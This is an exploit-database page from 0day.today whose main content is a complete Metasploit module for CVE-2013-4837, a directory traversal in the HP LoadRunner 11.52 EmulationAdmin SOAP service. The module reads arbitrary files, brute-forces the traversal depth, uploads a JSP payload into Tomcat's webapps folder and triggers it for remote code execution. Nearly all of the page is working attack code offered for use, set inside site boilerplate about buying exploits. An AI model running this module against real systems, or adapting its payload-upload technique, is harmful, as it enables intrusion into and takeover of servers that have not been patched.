0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
HP LoadRunner EmulationAdmin Web Service Directory Traversal
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
require 'msf/core' require 'rexml/document' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] } include REXML include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'HP LoadRunner EmulationAdmin Web Service Directory Traversal', 'Description' => %q{ This module exploits a directory traversal vulnerability on the version 11.52 of HP LoadRunner. The vulnerability exists on the EmulationAdmin web service, specifically in the copyFileToServer method, allowing to upload arbitrary files. This module has been tested successfully on HP LoadRunner 11.52 over Windows 2003 SP2. }, 'Author' => [ 'rgod <rgod[at]autistici.org>', # Vulnerability Discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-4837' ], [ 'OSVDB', '99231' ], [ 'BID', '63475' ], [ 'ZDI', '13-259' ], [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03969437' ] ], 'Privileged' => true, 'Platform' => 'win', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'HP LoadRunner 11.52', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 30 2013')) register_options( [ Opt::RPORT(8080), # By default files dropped into C:\windows\system32\null\ OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 3 ]), # By default HP LoadRunner installed on C:\Program Files\HP\LoadRunner OptString.new('INSTALLPATH', [ true, 'HP LoadRunner Install Path (from the root folder)', "Program Files\\HP\\LoadRunner" ]) ], self.class) end def get_soap_request(action, opts={}) path_param = opts[:path] contents_param = opts[:contents] se_name = '' case action when :upload se_name = 'ser:copyFileToServer' when :read se_name = 'ser:getFileContentAsLines' end xml = Document.new xml.add_element( "soapenv:Envelope", { 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance", 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema", 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/", 'xmlns:ser' => "http://service.emulation.ws.mercury.com" }) xml.root.add_element("soapenv:Header") xml.root.add_element("soapenv:Body") body = xml.root.elements[2] body.add_element( se_name, { 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" }) ser = body.elements[1] ser.add_element("in0", {'xsi:type' => 'xsd:int'}) ser.elements['in0'].text = 30000 + rand(30000) ser.add_element("in1", {'xsi:type' => 'xsd:string'}) ser.elements['in1'].text = path_param if action == :upload ser.add_element("in2", {'xsi:type' => "xsd:base64Binary"}) ser.elements['in2'].text = Rex::Text.encode_base64(contents_param) end xml.to_s end def check depth = datastore['DEPTH'] install_path = datastore['INSTALLPATH'] print_status("#{peer} - Detecting tomcat version...") tomcat_version = get_tomcat_version if tomcat_version print_status("#{peer} - Tomcat #{tomcat_version} detected... Verifying traversal...") location = "" location << install_path location << "\\" unless install_path.ends_with("\\") or install_path.ends_with("/") location << "apache-tomcat-#{tomcat_version}\\webapps\\ServiceEmulation" res = read_file(depth, location, "index.jsp") if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/ print_good("#{peer} - Traversal exists and parameters are correct...") return Exploit::CheckCode::Vulnerable elsif res and res.code == 500 and res.body.to_s =~ /FileNotFoundException/ print_warning("#{peer} - Traversal appears to exist, try adjusting parameters DEPTH and INSTALLPATH...") return Exploit::CheckCode::Appears else print_status("#{peer} - Failed to verify the directory traversal...") end else print_error("#{peer} - Tomcat version not detected...") end print_status("#{peer} - Checking if the vulnerable web service and method exist...") res = send_request_cgi({ 'uri' => normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin'), 'vars_get' => { 'wsdl' => 1 } }) if res and res.code == 200 and res.body.to_s =~ /wsdl.*EmulationAdmin/ and res.body.to_s =~ /copyFileToServerRequest/ return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit depth = datastore['DEPTH'] install_path = datastore['INSTALLPATH'] print_status("#{peer} - Retrieving the Tomcat version used...") tomcat_version = get_tomcat_version if tomcat_version.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to retrieve the Tomcat version used") else print_good("#{peer} - Tomcat #{tomcat_version} found") end print_status("#{peer} - Verifying parameters to exploit the directory traversal...") brute_force = false location = "" location << install_path location << "\\" unless install_path.ends_with("\\") or install_path.ends_with("/") location << "apache-tomcat-#{tomcat_version}\\webapps\\ServiceEmulation" res = read_file(depth, location, "index.jsp") if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/ print_good("#{peer} - Traversal parameters are correct") elsif res and res.code == 500 and res.body.to_s =~ /FileNotFoundException/ print_error("#{peer} - Traversal parameters are incorrect, will try to brute force depth...") brute_force = true else fail_with(Failure::Unknown, "#{peer} - Unknown error while verifying the traversal parameters") end if brute_force print_status("#{peer} - Trying to brute force the traversal depth...") depth = brute_force_depth(location) if depth.nil? fail_with(Failure::BadConfig, "#{peer} - Traversal parameters are incorrect, try setting DEPTH and INSTALLPATH") end print_good("#{peer} - Using #{depth} as depth length to exploit the traversal...") end jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" # It's uploading a JSP payload because AutoDeploy on the webapps directory isn't working on my tests print_status("#{peer} - Uploading the JSP payload...") res = upload_file(depth, location, jsp_name, payload.encoded) if res and res.code == 200 and res.body.to_s =~ /copyFileToServerResponse/ and res.body.to_s !~ /faultcode/ print_status("#{peer} - JSP payload uploaded successfully") register_files_for_cleanup("..\\..\\#{location}\\#{jsp_name}") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end print_status("#{peer} - Executing payload on #{normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin', jsp_name)}...") send_request_cgi({ 'uri' => normalize_uri('ServiceEmulation', jsp_name), 'method' => 'GET' }, 1) end def send_request_soap(soap_request) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ServiceEmulation', 'services', 'EmulationAdmin'), 'method' => 'POST', 'ctype' => 'text/xml; charset=UTF-8', 'data' => soap_request, 'headers' => { 'SOAPAction' => '""', } }) return res end def upload_file(traversal_depth, location, file_name, contents) path = "..\\" * traversal_depth path << location path << "\\" unless location[-1] == "/" or location[-1] == "\\" path << file_name req = get_soap_request(:upload, {:path => path, :contents => contents}) return send_request_soap(req) end def read_file(traversal_depth, location, file_name) path = "..\\" * traversal_depth path << location path << "\\" unless location[-1] == "/" or location[-1] == "\\" path << file_name req = get_soap_request(:read, {:path => path}) return send_request_soap(req) end def brute_force_depth(location) 10.times do |i| res = read_file(i, location, "index.jsp") if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/ return i end end return nil end def get_tomcat_version res = send_request_cgi({ 'uri' => normalize_uri('webdav') }) if res and res.code == 200 and res.body.to_s =~ /Apache Tomcat\/([\d\.]+)/ return $1 end return nil end end # 0day.today [2024-12-24] #